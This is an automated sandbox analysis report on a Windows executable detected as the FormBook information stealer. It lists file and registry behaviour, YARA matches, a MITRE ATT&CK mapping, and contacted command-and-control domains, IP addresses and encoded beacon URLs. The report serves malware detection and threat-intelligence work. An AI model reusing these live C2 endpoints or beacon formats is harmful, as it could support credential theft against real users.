Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\56460021473877.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 3.2.56460021473877.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.56460021473877.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.56460021473877.exe.350fe30.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.56460021473877.exe.34c5c10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000000.752209654.000000000EEF1000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.730886485.000000000EEF1000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.763748004.00000000015D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.940364992.0000000002530000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.695508447.00000000033A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.939915779.0000000000500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.763621485.00000000011C0000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 3.2.56460021473877.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.56460021473877.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.56460021473877.exe.350fe30.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.56460021473877.exe.34c5c10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000000.752209654.000000000EEF1000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.730886485.000000000EEF1000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.763748004.00000000015D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.940364992.0000000002530000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.695508447.00000000033A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.939915779.0000000000500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.763621485.00000000011C0000.00000040.00020000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection612	Masquerading1	Input Capture1	Security Software Discovery221	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion31	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection612	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information4	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing13	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	File Deletion1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
3.2.56460021473877.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

Source	Detection	Scanner	Link
serviciosgeneralesjba.online	6%	Virustotal	Browse
www.sapphiremodule.com	1%	Virustotal	Browse
txsports.club	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://www.txsports.club/ni8b/?ZfEhPp=lGGQ0sEZ2PLdmlcqvZgUhQs2XHM9QQiXiItD8ZWi5Y/Bd+WpsK3C+f5erJECmSl9JpeM&kTY=TdZdU	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.rajinderbeas.com/ni8b/?ZfEhPp=NtJPN2JufTPSUZxhVG2lwHAXNu/91wCxk6QRP91Jym6+DWJgifkFBuY1HfUXqRvRWjoF&kTY=TdZdU	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.fontbureau.comceomz	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.fontbureau.coma	0%	URL Reputation	safe
http://www.nhmingwei.com/ni8b/?ZfEhPp=bnsPHpJ0JXfYedDeyyRM0T59hyvcJozMf52DwVsUkht3MP5YfvQl77Z8cLzJCfxgsHVQ&kTY=TdZdU	0%	Avira URL Cloud	safe
http://www.collada.org/2005/11/COLLADASchema9Done	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://thecrystalconsciousness.com/ni8b/?ZfEhPp=JVySAPp733wZmQfNstMcOnNrXbLvf0xUB0jZ2Inh4UzmMU775P3S	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.box-770.com/ni8b/?ZfEhPp=5gklYs16rcBoTPwexQgZaEg2WcCOIBmXVnGtPO+7DRUqV3YS52r/gKUkKnDwsfv+vOIy&kTY=TdZdU	0%	Avira URL Cloud	safe
http://www.celltecstore.com/ni8b/?ZfEhPp=Zvg5mbxlh1FEUeAb4a18wQGVMNqECI22VVMpQ/dBRbKZgYLiDL5+JoutiYtpnsrAj+vq&kTY=TdZdU	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.thecrystalconsciousness.com/ni8b/?ZfEhPp=JVySAPp733wZmQfNstMcOnNrXbLvf0xUB0jZ2Inh4UzmMU775P3StTy/F8q5n6jJiQm6&kTY=TdZdU	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
www.nottryingdoing.com/ni8b/	0%	Avira URL Cloud	safe
http://www.sakkal.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
serviciosgeneralesjba.online	68.65.120.219	true	true	6%, Virustotal, Browse	unknown
www.sapphiremodule.com	44.227.65.245	true	true	1%, Virustotal, Browse	unknown
www.nhmingwei.com	154.208.173.144	true	true		unknown
txsports.club	148.72.177.185	true	true	1%, Virustotal, Browse	unknown
rajinderbeas.com	216.10.241.4	true	true		unknown
thecrystalconsciousness.com	31.170.167.144	true	true		unknown
ps-sac.com	67.205.83.103	true	true		unknown
www.box-770.com	213.186.33.5	true	true		unknown
mitiendanube.com	52.5.157.71	true	false		high
www.txsports.club	unknown	unknown	true		unknown
www.eastsidescooters.com	unknown	unknown	true		unknown
www.celltecstore.com	unknown	unknown	true		unknown
www.rajinderbeas.com	unknown	unknown	true		unknown
www.thecrystalconsciousness.com	unknown	unknown	true		unknown
www.ps-sac.com	unknown	unknown	true		unknown
www.serviciosgeneralesjba.online	unknown	unknown	true		unknown
www.ville-fogalmam.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.txsports.club/ni8b/?ZfEhPp=lGGQ0sEZ2PLdmlcqvZgUhQs2XHM9QQiXiItD8ZWi5Y/Bd+WpsK3C+f5erJECmSl9JpeM&kTY=TdZdU	true	Avira URL Cloud: safe	unknown
http://www.rajinderbeas.com/ni8b/?ZfEhPp=NtJPN2JufTPSUZxhVG2lwHAXNu/91wCxk6QRP91Jym6+DWJgifkFBuY1HfUXqRvRWjoF&kTY=TdZdU	true	Avira URL Cloud: safe	unknown
http://www.nhmingwei.com/ni8b/?ZfEhPp=bnsPHpJ0JXfYedDeyyRM0T59hyvcJozMf52DwVsUkht3MP5YfvQl77Z8cLzJCfxgsHVQ&kTY=TdZdU	true	Avira URL Cloud: safe	unknown
http://www.box-770.com/ni8b/?ZfEhPp=5gklYs16rcBoTPwexQgZaEg2WcCOIBmXVnGtPO+7DRUqV3YS52r/gKUkKnDwsfv+vOIy&kTY=TdZdU	true	Avira URL Cloud: safe	unknown
http://www.celltecstore.com/ni8b/?ZfEhPp=Zvg5mbxlh1FEUeAb4a18wQGVMNqECI22VVMpQ/dBRbKZgYLiDL5+JoutiYtpnsrAj+vq&kTY=TdZdU	true	Avira URL Cloud: safe	unknown
http://www.thecrystalconsciousness.com/ni8b/?ZfEhPp=JVySAPp733wZmQfNstMcOnNrXbLvf0xUB0jZ2Inh4UzmMU775P3StTy/F8q5n6jJiQm6&kTY=TdZdU	true	Avira URL Cloud: safe	unknown
www.nottryingdoing.com/ni8b/	true	Avira URL Cloud: safe	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com	56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	false		high
http://www.tiro.com	56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comceomz	56460021473877.exe, 00000000.00000002.694670637.0000000000AF7000.00000004.00000040.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	false		high
http://www.goodfont.co.kr	56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.coma	56460021473877.exe, 00000000.00000002.694670637.0000000000AF7000.00000004.00000040.sdmp	false	URL Reputation: safe	unknown
http://www.collada.org/2005/11/COLLADASchema9Done	56460021473877.exe, 00000000.00000002.699621675.0000000006A60000.00000004.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://thecrystalconsciousness.com/ni8b/?ZfEhPp=JVySAPp733wZmQfNstMcOnNrXbLvf0xUB0jZ2Inh4UzmMU775P3S	control.exe, 00000008.00000002.941761338.0000000004CE2000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	false		high
http://www.fonts.com	56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	false		high
http://www.sandoll.co.kr	56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
213.186.33.5	www.box-770.com	France	16276	OVHFR	true
52.5.157.71	mitiendanube.com	United States	14618	AMAZON-AESUS	false
216.10.241.4	rajinderbeas.com	India	394695	PUBLIC-DOMAIN-REGISTRYUS	true
67.205.83.103	ps-sac.com	Canada	32613	IWEB-ASCA	true
31.170.167.144	thecrystalconsciousness.com	United States	47583	AS-HOSTINGERLT	true
154.208.173.144	www.nhmingwei.com	Seychelles	40065	CNSERVERSUS	true
148.72.177.185	txsports.club	United States	30083	AS-30083-GO-DADDY-COM-LLCUS	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	502358
Start date:	13.10.2021
Start time:	20:33:16
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	56460021473877.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/1@11/7
EGA Information:	Failed
HDC Information:	Successful, ratio: 11.3% (good quality ratio 10%) Quality average: 72.3% Quality standard deviation: 32.5%
HCA Information:	Successful, ratio: 99% Number of executed functions: 70 Number of non-executed functions: 104
